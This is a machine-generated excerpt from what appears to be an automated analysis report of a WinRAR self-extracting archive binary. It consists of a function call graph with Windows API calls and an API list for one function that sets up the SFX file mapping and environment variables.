28675->28676 29937 e62dbb 28676->29937 28679 e7fe43 28681 e6232c 123 API calls 28679->28681 28680 e7fe4c 29944 e6278b 28680->29944 28683 e7fe48 28681->28683 28686 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28683->28686 28685 e6232c 123 API calls 28685->28683 28687 e7fe77 28686->28687 28687->28330 28687->28334 28688->28301 28690 e61df3 SetDlgItemTextW 28689->28690 28691 e61df1 28689->28691 28690->28307 28691->28690 28692->28269 28694 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28693->28694 28695 e857a0 28694->28695 28695->28695 28697 e614bd _wcslen 28696->28697 28698 e6120c 28 API calls 28697->28698 28699 e614ca 28698->28699 28700 e83572 28699->28700 30028 e80678 PeekMessageW 28700->30028 28703 e835ac 28707 e835b7 ShowWindow SendMessageW SendMessageW 28703->28707 28704 e835e4 SendMessageW SendMessageW 28705 e83643 SendMessageW 28704->28705 28706 e83624 28704->28706 28708 e8365b 28705->28708 28709 e8365d SendMessageW SendMessageW 28705->28709 28706->28705 28707->28704 28708->28709 28710 e8367f SendMessageW 28709->28710 28711 e836a2 SendMessageW 28709->28711 28710->28711 28712 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28711->28712 28713 e836c0 28712->28713 28713->28333 28715 e6768c 28714->28715 30033 e67430 28715->30033 28717 e67699 28718 e834eb 28 API calls __EH_prolog3_GS 28717->28718 28718->28326 30044 e768d4 28719->30044 28722->28348 28724 e6ed1f 49 API calls 28723->28724 28725 e6ed16 28724->28725 28725->28355 28725->28385 28726->28355 28728 e71405 __EH_prolog3 28727->28728 28729 e856f6 28 API calls 28728->28729 28732 e7140f 28729->28732 28730 e71431 GetModuleFileNameW 28731 e71463 28730->28731 28730->28732 28734 e614a7 28 API calls 28731->28734 28732->28730 28732->28731 28733 e61be3 28 API calls 28732->28733 28733->28732 28735 e7146c 28734->28735 28736 e7147f 28735->28736 28737 e612a7 26 API calls 28735->28737 28736->28424 28737->28736 28738->28436 28739->28470 28740->28475 28741->28480 28742->28485 
28743->28489 28745 e62e93 28744->28745 28746 e62ea0 28744->28746 28747 e612a7 26 API calls 28745->28747 28746->28504 28747->28746 28748->28423 28749->28293 28750->28392 28751->28362 28752->28394 28753->28382 28754->28364 28755->28514 28756->28511 28757->28520 28772 e857d8 28758->28772 28760 e61d70 GetWindowTextLengthW 28773 e61bbd 28 API calls 28760->28773 28762 e61dab GetWindowTextW 28763 e614a7 28 API calls 28762->28763 28764 e61dca 28763->28764 28765 e61ddd 28764->28765 28774 e612a7 28764->28774 28766 e85787 5 API calls 28765->28766 28768 e61de4 28766->28768 28768->28525 28779 e85734 28769->28779 28771 e61d61 28771->28292 28771->28293 28771->28415 28772->28760 28773->28762 28775 e612c1 28774->28775 28776 e612b4 28774->28776 28775->28765 28778 e619a9 26 API calls 28776->28778 28778->28775 28780 e8573c 28779->28780 28781 e8573d IsProcessorFeaturePresent 28779->28781 28780->28771 28783 e85bfc 28781->28783 28786 e85bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28783->28786 28785 e85cdf 28785->28771 28786->28785 28788 e676e1 28787->28788 28789 e676bb 28787->28789 28822 e658cb 45 API calls 28788->28822 28813 e6120c 28789->28813 28793 e676db 28793->28538 28797 e6effb __EH_prolog3_GS 28794->28797 28795 e6f02f 28798 e6ed0d 49 API calls 28795->28798 28796 e6f01b CreateDirectoryW 28796->28795 28799 e6f0d0 28796->28799 28797->28795 28797->28796 28800 e6f03b 28798->28800 28801 e6f0df 28799->28801 28866 e6f58b 28799->28866 28802 e6f0e3 GetLastError 28800->28802 28879 e7169a 28800->28879 28805 e85787 5 API calls 28801->28805 28802->28801 28807 e6f100 28805->28807 28807->28538 28808 e6f07d 28812 e6f0ad 28808->28812 28936 e619a9 26 API calls 28808->28936 28809 e6f073 CreateDirectoryW 28809->28808 28810 e6f070 28810->28809 28812->28799 28812->28802 28814 e6127d 28813->28814 28818 e6121d 28813->28818 28830 e61a92 28 API calls 28814->28830 28816 e61228 28816->28793 28818->28816 28823 e612d3 28 API calls Concurrency::cancel_current_task 
28818->28823 28820 e61254 28824 e611b8 28820->28824 28823->28820 28825 e611c3 28824->28825 28826 e611cb 28824->28826 28845 e611dd 28825->28845 28829 e611c9 28826->28829 28831 e856f6 28826->28831 28829->28816 28833 e856fb 28831->28833 28834 e85715 28833->28834 28836 e85717 28833->28836 28854 e8d08c 28833->28854 28861 e8e91a 7 API calls 2 library calls 28833->28861 28834->28829 28837 e61a25 Concurrency::cancel_current_task 28836->28837 28839 e85721 28836->28839 28838 e8734a Concurrency::cancel_current_task RaiseException 28837->28838 28842 e61a41 28838->28842 28840 e8734a Concurrency::cancel_current_task RaiseException 28839->28840 28841 e86628 28840->28841 28843 e612a7 26 API calls 28842->28843 28844 e61a5a 28842->28844 28843->28844 28844->28829 28846 e61206 28845->28846 28847 e611e8 28845->28847 28865 e61a25 27 API calls Concurrency::cancel_current_task 28846->28865 28848 e856f6 28 API calls 28847->28848 28852 e611ee 28848->28852 28850 e6120b 28851 e611f5 28851->28829 28852->28851 28864 e8ac9e 26 API calls ___std_exception_copy 28852->28864 28859 e9040e __dosmaperr 28854->28859 28855 e9044c 28863 e901d3 20 API calls __dosmaperr 28855->28863 28856 e90437 RtlAllocateHeap 28858 e9044a 28856->28858 28856->28859 28858->28833 28859->28855 28859->28856 28862 e8e91a 7 API calls 2 library calls 28859->28862 28861->28833 28862->28859 28863->28858 28865->28850 28867 e6f597 __EH_prolog3_GS 28866->28867 28868 e6f5a4 SetFileAttributesW 28867->28868 28869 e6f5b7 28868->28869 28877 e6f622 28868->28877 28870 e7169a 47 API calls 28869->28870 28872 e6f5d7 28870->28872 28871 e85787 5 API calls 28873 e6f638 28871->28873 28874 e6f5f6 28872->28874 28875 e6f5e7 SetFileAttributesW 28872->28875 28876 e6f5e4 28872->28876 28873->28801 28874->28877 28937 e619a9 26 API calls 28874->28937 28875->28874 28876->28875 28877->28871 28880 e716e7 28879->28880 28894 e716e0 28879->28894 28881 e614a7 28 API calls 28880->28881 28884 e716f4 28881->28884 28882 e85734 
__ehhandler$___std_fs_change_permissions@12 5 API calls 28883 e6f063 28882->28883 28883->28808 28883->28809 28883->28810 28885 e71711 28884->28885 28886 e717db 28884->28886 28888 e7171b 28885->28888 28895 e71741 28885->28895 28887 e71309 30 API calls 28886->28887 28893 e717fb 28887->28893 28938 e70ba6 28 API calls 28888->28938 28889 e718ed 28900 e71739 28889->28900 28949 e619a9 26 API calls 28889->28949 28891 e61a66 26 API calls 28891->28894 28892 e71729 28939 e625a4 28892->28939 28893->28889 28898 e71875 28893->28898 28899 e7181f 28893->28899 28894->28882 28895->28900 28906 e6769f 45 API calls 28895->28906 28947 e70ba6 28 API calls 28898->28947 28945 e70c41 28 API calls 28899->28945 28900->28891 28901 e71731 28903 e61a66 26 API calls 28901->28903 28903->28900 28904 e71883 28907 e625a4 26 API calls 28904->28907 28909 e71789 28906->28909 28910 e7188c 28907->28910 28908 e71838 28946 e61188 28 API calls 28908->28946 28943 e70bf3 28 API calls _wcslen 28909->28943 28913 e61a66 26 API calls 28910->28913 28916 e71894 28913->28916 28914 e71848 28921 e625a4 26 API calls 28914->28921 28915 e7179e 28944 e6aef3 28 API calls 28915->28944 28948 e70ddb 28 API calls 28916->28948 28919 e717b2 28920 e625a4 26 API calls 28919->28920 28922 e717be 28920->28922 28923 e71860 28921->28923 28924 e61a66 26 API calls 28922->28924 28925 e61a66 26 API calls 28923->28925 28927 e717c6 28924->28927 28929 e71868 28925->28929 28926 e6769f 45 API calls 28933 e71870 28926->28933 28930 e61a66 26 API calls 28927->28930 28928 e7189c 28928->28926 28931 e61a66 26 API calls 28929->28931 28932 e717ce 28930->28932 28931->28933 28934 e61a66 26 API calls 28932->28934 28935 e61a66 26 API calls 28933->28935 28934->28900 28935->28889 28936->28812 28937->28877 28938->28892 28940 e625b2 28939->28940 28941 e625ad 28939->28941 28940->28901 28942 e61a66 26 API calls 28941->28942 28942->28940 28943->28915 28944->28919 28945->28908 28946->28914 28947->28904 28948->28928 28949->28900 28951 e62f26 28950->28951 28952 
e62f2f 28950->28952 28951->28553 28953 e6120c 28 API calls 28952->28953 28953->28951 28955 e65975 28954->28955 28956 e65a3a 28954->28956 28957 e65987 28955->28957 28961 e63029 28 API calls 28955->28961 28962 e658cb 45 API calls 28956->28962 28957->28558 28961->28957 28963->28563 28965 e6e015 28964->28965 28966 e6dfeb 28964->28966 28965->28580 28966->28965 28975 e6ec63 28966->28975 28971 e6de76 28969->28971 28972 e6de5c 28969->28972 28970 e6de95 28970->28580 28971->28970 28989 e6925b 109 API calls 28971->28989 28972->28971 28973 e6de68 CloseHandle 28972->28973 28973->28971 28976 e6ec6f __EH_prolog3_GS 28975->28976 28977 e6ec7c DeleteFileW 28976->28977 28978 e6ec8c 28977->28978 28986 e6ecf4 28977->28986 28979 e7169a 47 API calls 28978->28979 28982 e6ecac 28979->28982 28980 e85787 5 API calls 28981 e6e013 28980->28981 28981->28580 28983 e6ecbc DeleteFileW 28982->28983 28984 e6ecb9 28982->28984 28985 e6ecc8 28982->28985 28983->28985 28984->28983 28985->28986 28988 e619a9 26 API calls 28985->28988 28986->28980 28988->28986 28989->28970 28996 e7347b 28990->28996 28993 e74346 SetDlgItemTextW 28993->28587 28994 e7436c LoadStringW 28994->28993 28995 e74383 LoadStringW 28994->28995 28995->28993 29003 e7338e 28996->29003 28999 e734bc 29001 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28999->29001 29002 e734d1 29001->29002 29002->28993 29002->28994 29004 e733c2 29003->29004 29012 e73445 _strncpy 29003->29012 29008 e733e2 29004->29008 29014 e789ed WideCharToMultiByte 29004->29014 29006 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29007 e73474 29006->29007 29007->28999 29013 e734d5 26 API calls 29007->29013 29011 e73413 29008->29011 29015 e742b2 50 API calls __vsnprintf 29008->29015 29016 e8d097 26 API calls 3 library calls 29011->29016 29012->29006 29013->28999 29014->29008 29015->29011 29016->29012 29017->28604 29018->28604 29019->28604 29020->28604 29021->28604 29024 e76a99 _wcslen 29023->29024 29078 e61be3 29024->29078 29026 e76abb 
29026->28621 29028 e76a74 29027->29028 29029 e76a89 28 API calls 29028->29029 29030 e76a86 29029->29030 29031 e6b03d 29030->29031 29032 e6b049 __EH_prolog3_GS 29031->29032 29083 e72815 29032->29083 29034 e6b092 29093 e6b231 29034->29093 29037 e61a66 26 API calls 29038 e6b120 29037->29038 29039 e61a66 26 API calls 29038->29039 29040 e6b128 29039->29040 29041 e856f6 28 API calls 29040->29041 29042 e6b13f 29041->29042 29098 e7a599 29042->29098 29044 e6b172 29045 e85787 5 API calls 29044->29045 29046 e6b179 29045->29046 29047 e6b3e1 29046->29047 29048 e6b3ed __EH_prolog3_GS 29047->29048 29049 e6b478 29048->29049 29052 e6b484 29048->29052 29152 e6f711 29048->29152 29050 e61a66 26 API calls 29049->29050 29050->29052 29057 e6b4e0 29052->29057 29119 e6bc65 29052->29119 29053 e6b529 29054 e85787 5 API calls 29053->29054 29056 e6b543 29054->29056 29059 e6b194 29056->29059 29057->29053 29159 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29057->29159 29867 e6d6bc 29059->29867 29063 e61a66 26 API calls 29065 e6b1e8 29063->29065 29064 e6b1d0 29064->29063 29066 e61a66 26 API calls 29065->29066 29067 e6b1f3 29066->29067 29068 e61a66 26 API calls 29067->29068 29069 e6b1fe 29068->29069 29881 e728aa 29069->29881 29071 e6b206 29072 e61a66 26 API calls 29071->29072 29073 e6b20e 29072->29073 29074 e61a66 26 API calls 29073->29074 29075 e6b216 29074->29075 29076 e6d869 26 API calls 29075->29076 29077 e6b21d 29076->29077 29077->28630 29079 e61c03 29078->29079 29080 e61bfb 29078->29080 29079->29080 29082 e61c33 28 API calls 29079->29082 29080->29026 29082->29080 29084 e72821 __EH_prolog3 29083->29084 29085 e856f6 28 API calls 29084->29085 29086 e7285f 29085->29086 29087 e72872 29086->29087 29104 e680ec 29086->29104 29089 e856f6 28 API calls 29087->29089 29090 e72883 29089->29090 29091 e680ec 28 API calls 29090->29091 29092 e72896 29090->29092 29091->29092 29092->29034 29094 e625a4 26 API calls 29093->29094 29095 e6b23f 29094->29095 29096 e625a4 26 API calls 29095->29096 
29097 e6b118 29096->29097 29097->29037 29099 e7a5a5 __EH_prolog3 29098->29099 29100 e856f6 28 API calls 29099->29100 29101 e7a5bf 29100->29101 29102 e7a5d6 29101->29102 29118 e77445 112 API calls 29101->29118 29102->29044 29105 e680f8 __EH_prolog3 29104->29105 29110 e85b4b 29105->29110 29107 e68111 29108 e85b4b 28 API calls 29107->29108 29109 e68133 __cftof 29108->29109 29109->29087 29111 e85b57 __FrameHandler3::FrameUnwindToState 29110->29111 29112 e85b82 29111->29112 29114 e68180 29111->29114 29112->29107 29115 e6818c __EH_prolog3 29114->29115 29116 e74f2b 28 API calls 29115->29116 29117 e68196 29116->29117 29117->29111 29118->29102 29120 e6bc80 29119->29120 29160 e620b0 29120->29160 29122 e6bca7 29123 e6bcba 29122->29123 29384 e6e910 29122->29384 29128 e6bcec 29123->29128 29172 e627e0 29123->29172 29126 e6bce8 29126->29128 29196 e62d41 160 API calls __EH_prolog3_GS 29126->29196 29361 e6232c 29128->29361 29133 e6bd14 29134 e6be08 29133->29134 29135 e67673 28 API calls 29133->29135 29197 e6bec2 7 API calls 29134->29197 29137 e6bd36 29135->29137 29388 e71e54 46 API calls 2 library calls 29137->29388 29139 e6f711 53 API calls 29148 e6bd53 29139->29148 29140 e6be76 29140->29128 29201 e652d8 29140->29201 29213 e6bf3d 29140->29213 29141 e6be16 29141->29140 29198 e7864f 29141->29198 29143 e6bde8 29146 e61a66 26 API calls 29143->29146 29145 e61a66 26 API calls 29145->29148 29149 e6bded 29146->29149 29148->29139 29148->29143 29148->29145 29389 e71e54 46 API calls 2 library calls 29148->29389 29150 e61a66 26 API calls 29149->29150 29150->29134 29153 e71a9f 5 API calls 29152->29153 29154 e6f723 29153->29154 29155 e6f74b 29154->29155 29825 e6f826 29154->29825 29155->29048 29158 e6f738 FindClose 29158->29155 29159->29053 29161 e620bc __EH_prolog3 29160->29161 29162 e680ec 28 API calls 29161->29162 29163 e620d9 29162->29163 29164 e72815 28 API calls 29163->29164 29165 e620e8 29164->29165 29166 e62193 29165->29166 29167 e856f6 28 API calls 29165->29167 29390 e7026f 29166->29390 
29169 e62180 29167->29169 29169->29166 29170 e676e7 30 API calls 29169->29170 29170->29166 29171 e62227 __cftof 29171->29122 29173 e627ec __EH_prolog3 29172->29173 29174 e611dd 28 API calls 29173->29174 29181 e62838 29173->29181 29193 e6298b 29173->29193 29179 e62882 29174->29179 29175 e629a9 29410 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29175->29410 29177 e652d8 133 API calls 29183 e629f4 29177->29183 29178 e629b6 29178->29177 29178->29193 29401 e6e850 29179->29401 29180 e62a3c 29185 e62a6f 29180->29185 29180->29193 29411 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29180->29411 29181->29175 29181->29178 29183->29180 29184 e652d8 133 API calls 29183->29184 29184->29183 29185->29193 29194 e6e850 111 API calls 29185->29194 29186 e62986 29189 e62e8b 26 API calls 29186->29189 29187 e62995 29188 e62e8b 26 API calls 29187->29188 29188->29181 29189->29193 29190 e628ad 29190->29186 29190->29187 29191 e652d8 133 API calls 29192 e62ac0 29191->29192 29192->29191 29192->29193 29193->29126 29194->29192 29196->29133 29197->29141 29414 e84300 29198->29414 29202 e652e4 29201->29202 29203 e652e8 29201->29203 29202->29140 29212 e6e850 111 API calls 29203->29212 29204 e652fa 29205 e65315 29204->29205 29206 e65323 29204->29206 29207 e65355 29205->29207 29444 e648aa 118 API calls 2 library calls 29205->29444 29445 e63d9d 131 API calls 3 library calls 29206->29445 29207->29140 29210 e65321 29210->29207 29446 e6344b 89 API calls 29210->29446 29212->29204 29214 e6bf95 29213->29214 29219 e6bfc4 29214->29219 29226 e6c2fd 29214->29226 29546 e7cdb4 135 API calls __EH_prolog3_GS 29214->29546 29216 e6d2e5 29217 e6d331 29216->29217 29218 e6d2ea 29216->29218 29217->29226 29618 e7cdb4 135 API calls __EH_prolog3_GS 29217->29618 29218->29226 29617 e6ab88 185 API calls 29218->29617 29219->29216 29224 e6bfeb 29219->29224 29219->29226 29220 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29221 e6d327 29220->29221 29221->29140 29224->29226 29447 
e67e1b 29224->29447 29226->29220 29227 e6c0c8 29459 e7106b 29227->29459 29231 e6c151 29238 e6c16f 29231->29238 29548 e72095 45 API calls __EH_prolog3_GS 29231->29548 29232 e6c239 29234 e6c269 29232->29234 29236 e6c374 29232->29236 29242 e6c29b 29234->29242 29549 e619a9 26 API calls 29234->29549 29239 e6c3cf 29236->29239 29240 e6c3ea 29236->29240 29292 e6d205 29236->29292 29237 e6c948 29253 e6c97a 29237->29253 29584 e619a9 26 API calls 29237->29584 29238->29232 29551 e70ddb 28 API calls 29238->29551 29244 e61a66 26 API calls 29239->29244 29256 e6c409 29240->29256 29553 e6b92d 56 API calls __ehhandler$___std_fs_change_permissions@12 29240->29553 29241 e6d276 29241->29226 29616 e619a9 26 API calls 29241->29616 29242->29226 29550 e619a9 26 API calls 29242->29550 29247 e6c3da 29244->29247 29252 e61a66 26 API calls 29247->29252 29252->29226 29253->29226 29585 e619a9 26 API calls 29253->29585 29254 e6c33d _wcslen 29552 e6f103 52 API calls 2 library calls 29254->29552 29255 e6c4ea 29469 e6b2ee 29255->29469 29256->29255 29258 e6f711 53 API calls 29256->29258 29267 e6c49b 29258->29267 29261 e6c5c2 29262 e6c7d8 29261->29262 29266 e6c5cf 29261->29266 29562 e72a36 115 API calls 29262->29562 29263 e61a66 26 API calls 29263->29255 29301 e6c62c 29266->29301 29556 e657c0 28 API calls 2 library calls 29266->29556 29267->29263 29270 e6c501 29275 e6c551 29270->29275 29554 e619a9 26 API calls 29270->29554 29272 e6c8f0 29279 e6c9eb 29272->29279 29297 e6c8ff 29272->29297 29273 e6c830 29273->29272 29280 e6c859 29273->29280 29275->29226 29555 e619a9 26 API calls 29275->29555 29277 e6c743 29277->29241 29615 e619a9 26 API calls 29277->29615 29293 e6c874 29279->29293 29475 e6b345 29279->29475 29284 e6ed0d 49 API calls 29280->29284 29287 e6ca64 29280->29287 29280->29293 29281 e6c940 29283 e6ddc7 114 API calls 29281->29283 29283->29237 29289 e6c8b3 29284->29289 29285 e6ca01 29290 e6ca05 29285->29290 29481 e6b778 29285->29481 29286 e6d1f2 29288 e6ddc7 114 API calls 29286->29288 29287->29286 
29313 e6cac5 29287->29313 29586 e6e152 29287->29586 29288->29292 29289->29293 29564 e6d8b8 29289->29564 29294 e6ddc7 114 API calls 29290->29294 29292->29237 29292->29277 29293->29287 29293->29290 29304 e6b345 90 API calls 29293->29304 29294->29277 29297->29281 29583 e6b544 144 API calls __EH_prolog3_GS 29297->29583 29300 e6cb15 29306 e6fd70 28 API calls 29300->29306 29301->29277 29302 e6c77a 29301->29302 29309 e6c781 29301->29309 29557 e6b015 28 API calls 29301->29557 29558 e72a36 115 API calls 29301->29558 29559 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29301->29559 29560 e6b8ed 89 API calls 29301->29560 29561 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29302->29561 29308 e6ca5e 29304->29308 29328 e6cb2f 29306->29328 29308->29287 29308->29290 29309->29273 29563 e6ede9 119 API calls __ehhandler$___std_fs_change_permissions@12 29309->29563 29311 e6cab7 29590 e69653 109 API calls 29311->29590 29511 e6fd70 29313->29511 29314 e6cc21 29315 e6cc76 29314->29315 29316 e6cf27 29314->29316 29317 e6cd33 29315->29317 29319 e6cc94 29315->29319 29320 e6cf50 29316->29320 29321 e6cf39 29316->29321 29341 e6ccb5 29316->29341 29594 e722b9 28 API calls 29317->29594 29323 e6ccd8 29319->29323 29333 e6cca3 29319->29333 29515 e79625 29320->29515 29601 e6d771 29321->29601 29322 e6cd69 29326 e7106b 45 API calls 29322->29326 29323->29341 29593 e6a7a2 142 API calls 29323->29593 29331 e6cd76 29326->29331 29327 e6cf73 29533 e794ea 29327->29533 29328->29314 29591 e6e39d 8 API calls 29328->29591 29595 e6b92d 56 API calls __ehhandler$___std_fs_change_permissions@12 29331->29595 29592 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29333->29592 29337 e6cdaf 29338 e6cddd 29337->29338 29339 e6cddf 29337->29339 29340 e6cdcd 29337->29340 29346 e6ce3e 29338->29346 29598 e619a9 26 API calls 29338->29598 29597 e6d3d7 135 API calls __ehhandler$___std_fs_change_permissions@12 29339->29597 29596 e6a496 119 API calls 29340->29596 29347 e6cf15 
29341->29347 29600 e6fd28 5 API calls __ehhandler$___std_fs_change_permissions@12 29341->29600 29346->29341 29599 e619a9 26 API calls 29346->29599 29350 e6d044 29347->29350 29612 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29347->29612 29349 e6d115 29541 e6e772 29349->29541 29350->29286 29350->29349 29354 e6d161 29350->29354 29540 e6e8d9 SetEndOfFile 29350->29540 29353 e6d159 29355 e6de50 110 API calls 29353->29355 29354->29286 29356 e6f58b 49 API calls 29354->29356 29355->29354 29357 e6d1d2 29356->29357 29357->29286 29613 e632d2 89 API calls __ehhandler$___std_fs_change_permissions@12 29357->29613 29359 e6d1e8 29614 e69500 109 API calls __EH_prolog3_GS 29359->29614 29362 e6233e 29361->29362 29366 e62350 29361->29366 29362->29366 29821 e623b0 26 API calls 29362->29821 29363 e61a66 26 API calls 29365 e62369 29363->29365 29822 e62ed0 26 API calls 29365->29822 29366->29363 29368 e62374 29823 e624d9 26 API calls 29368->29823 29385 e6e927 29384->29385 29386 e6e931 29385->29386 29824 e693d7 110 API calls __EH_prolog3_GS 29385->29824 29386->29123 29388->29148 29389->29148 29391 e7028f __cftof 29390->29391 29398 e70152 29391->29398 29394 e61a66 26 API calls 29395 e702b4 29394->29395 29396 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29395->29396 29397 e702bf 29396->29397 29397->29171 29399 e625a4 26 API calls 29398->29399 29400 e701c7 29399->29400 29400->29394 29402 e6e862 29401->29402 29405 e6e875 29401->29405 29407 e6e880 29402->29407 29412 e69490 109 API calls 29402->29412 29404 e6e888 SetFilePointer 29406 e6e8a4 GetLastError 29404->29406 29404->29407 29405->29404 29405->29407 29406->29407 29408 e6e8ae 29406->29408 29407->29190 29408->29407 29413 e69490 109 API calls 29408->29413 29410->29193 29411->29185 29412->29405 29413->29407 29415 e8430c __EH_prolog3_GS 29414->29415 29430 e72117 29415->29430 29418 e74318 53 API calls 29419 e84342 29418->29419 29420 e76a25 53 API calls 29419->29420 29421 e8434c 29420->29421 29422 e61a66 26 API 
calls 29421->29422 29423 e8435b 29422->29423 29434 e83ec5 29423->29434 29426 e61a66 26 API calls 29427 e84375 29426->29427 29428 e85787 5 API calls 29427->29428 29429 e78665 29428->29429 29429->29140 29431 e72124 29430->29431 29432 e6769f 45 API calls 29431->29432 29433 e72136 29432->29433 29433->29418 29435 e83ed1 __EH_prolog3_GS 29434->29435 29436 e614a7 28 API calls 29435->29436 29437 e83edd 29436->29437 29438 e83572 21 API calls 29437->29438 29439 e83eec 29438->29439 29440 e61a66 26 API calls 29439->29440 29441 e83ef4 29440->29441 29442 e85787 5 API calls 29441->29442 29443 e83ef9 29442->29443 29443->29426 29444->29210 29445->29210 29446->29207 29448 e67e27 __EH_prolog3_GS 29447->29448 29619 e67bfc 29448->29619 29450 e67e68 29455 e67ed2 29450->29455 29456 e67e6c 29450->29456 29458 e67ebe 29450->29458 29624 e67bd6 30 API calls 29450->29624 29451 e85787 5 API calls 29452 e67ecf 29451->29452 29452->29227 29454 e61a66 26 API calls 29454->29456 29455->29458 29625 e6adaa CompareStringW 29455->29625 29456->29451 29458->29454 29468 e71095 29459->29468 29460 e71256 29462 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29460->29462 29461 e6769f 45 API calls 29463 e71241 29461->29463 29464 e6c11b 29462->29464 29465 e625a4 26 API calls 29463->29465 29464->29238 29547 e72095 45 API calls __EH_prolog3_GS 29464->29547 29466 e7124d 29465->29466 29467 e61a66 26 API calls 29466->29467 29467->29460 29468->29460 29468->29461 29470 e6b303 29469->29470 29471 e6b33b 29470->29471 29668 e69635 89 API calls 29470->29668 29471->29261 29471->29270 29473 e6b333 29669 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29473->29669 29476 e6b368 29475->29476 29480 e6b39e 29475->29480 29476->29480 29670 e785fd 75 API calls 29476->29670 29478 e6b39a 29478->29480 29671 e632a1 89 API calls __ehhandler$___std_fs_change_permissions@12 29478->29671 29480->29285 29482 e6b784 __EH_prolog3_GS 29481->29482 29483 e6b8e3 29482->29483 29485 e6d8b8 138 API calls 29482->29485 
29484 e85787 5 API calls 29483->29484 29486 e6b8ea 29484->29486 29487 e6b7ef 29485->29487 29486->29293 29487->29483 29672 e69283 109 API calls 29487->29672 29489 e6b817 29490 e6ed0d 49 API calls 29489->29490 29491 e6b81d 29490->29491 29492 e6b838 29491->29492 29673 e6ed1f 29491->29673 29686 e71a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29492->29686 29495 e6b83e 29495->29483 29687 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29495->29687 29497 e6b850 29499 e67673 28 API calls 29497->29499 29498 e6b827 29498->29492 29685 e632a1 89 API calls __ehhandler$___std_fs_change_permissions@12 29498->29685 29501 e6b859 29499->29501 29502 e6b88d 29501->29502 29688 e6ede9 119 API calls __ehhandler$___std_fs_change_permissions@12 29501->29688 29503 e6eaf3 54 API calls 29502->29503 29507 e6b8c9 29502->29507 29505 e6b8a1 29503->29505 29506 e6d8b8 138 API calls 29505->29506 29508 e6b8c5 29506->29508 29509 e61a66 26 API calls 29507->29509 29508->29507 29689 e69283 109 API calls 29508->29689 29509->29483 29512 e6fd7e 29511->29512 29514 e6fd88 29511->29514 29513 e856f6 28 API calls 29512->29513 29513->29514 29514->29300 29516 e79639 29515->29516 29517 e7975f 29516->29517 29520 e79644 29516->29520 29519 e8734a Concurrency::cancel_current_task RaiseException 29517->29519 29518 e79739 29518->29327 29525 e7970b 29519->29525 29520->29518 29521 e796ed 29520->29521 29523 e8d08c ___std_exception_copy 21 API calls 29520->29523 29520->29525 29521->29518 29524 e7971f 29521->29524 29521->29525 29522 e8734a Concurrency::cancel_current_task RaiseException 29528 e797a3 __EH_prolog3 __cftof 29522->29528 29523->29521 29524->29518 29691 e79556 89 API calls 4 library calls 29524->29691 29525->29522 29527 e79896 29527->29327 29528->29527 29529 e85b4b 28 API calls 29528->29529 29531 e7982d __cftof 29528->29531 29529->29531 29530 e8d08c ___std_exception_copy 21 API calls 29530->29531 29531->29527 29531->29530 29692 

Control-flow Graph for function e8454a (graph node and edge data not reproduced)
                                                                                              APIs
                                                                                                • Part of subcall function 00E76D7B: GetModuleHandleW.KERNEL32(kernel32,522FB702), ref: 00E76DC7
                                                                                                • Part of subcall function 00E76D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E76DD9
                                                                                                • Part of subcall function 00E76D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E76E03
                                                                                                • Part of subcall function 00E71309: __EH_prolog3.LIBCMT ref: 00E71310
                                                                                                • Part of subcall function 00E71309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00E717FB,?,?,\\?\,522FB702,?,?,?,00000000,00E9A279,000000FF), ref: 00E71319
                                                                                                • Part of subcall function 00E7F4D4: OleInitialize.OLE32(00000000), ref: 00E7F4ED
                                                                                                • Part of subcall function 00E7F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E7F524
                                                                                                • Part of subcall function 00E7F4D4: SHGetMalloc.SHELL32(00EB532C), ref: 00E7F52E
                                                                                              • GetCommandLineW.KERNEL32 ref: 00E84608
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00E8464F
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00E84661
                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00E8466F
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00E8467D
                                                                                                • Part of subcall function 00E7FC38: __EH_prolog3.LIBCMT ref: 00E7FC3F
                                                                                                • Part of subcall function 00E83EFC: __EH_prolog3_GS.LIBCMT ref: 00E83F03
                                                                                                • Part of subcall function 00E83EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00E83F1B
                                                                                                • Part of subcall function 00E83EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00E83F86
                                                                                                • Part of subcall function 00E751BF: _wcslen.LIBCMT ref: 00E751E3
                                                                                              • UnmapViewOfFile.KERNEL32(00000000,00EB5430,00000400,00EB5430,00EB5430,00000400,00000000,00000001,?,00000000), ref: 00E846CC
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E846D3
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00EA9698,00000000), ref: 00E8472F
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00E8473A
                                                                                              • _swprintf.LIBCMT ref: 00E84779
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E8478E
